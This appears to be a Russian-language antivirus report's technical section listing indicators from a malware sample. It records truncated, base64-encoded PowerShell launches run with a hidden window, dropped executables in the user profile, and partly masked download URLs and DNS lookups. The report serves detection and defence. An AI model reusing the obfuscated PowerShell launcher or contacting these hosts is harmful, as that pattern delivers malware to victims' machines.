Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABZAHQAbAAyAHMAawB0AD0AKAAnAEYAJwArACcAaQAnACsAKAAnAHcAdgBvACcAKwAnADkANQAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUATgBWADoAdQBzAEUAUgBwAFIATw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1444
- %TEMP%\861078.cvr
- %HOMEPATH%\femi464\tt881nh\mqb8i9j.exe
- %HOMEPATH%\femi464\tt881nh\mqb8i9j.exe
- 've###twork.com':80
- 'fa######hickenargentina.com':80
- http://ve###twork.com/chub-new/mOXP1b1/
- http://fa######hickenargentina.com/cgi-bin/wg/
- DNS ASK ve###twork.com
- DNS ASK ww##.#eonetwork.com
- DNS ASK ca####renoperu.com
- DNS ASK fa######hickenargentina.com
- DNS ASK du####e-partner.com
- DNS ASK ke###elidze.com
- DNS ASK fu###ovie1.co
- DNS ASK bj###ghuan.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABZAHQAbAAyAHMAawB0AD0AKAAnAEYAJwArACcAaQAnACsAKAAnAHcAdgBvACcAKwAnADkANQAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUATgBWADoAdQBzAEUAUgBwAFIATw... (со скрытым окном)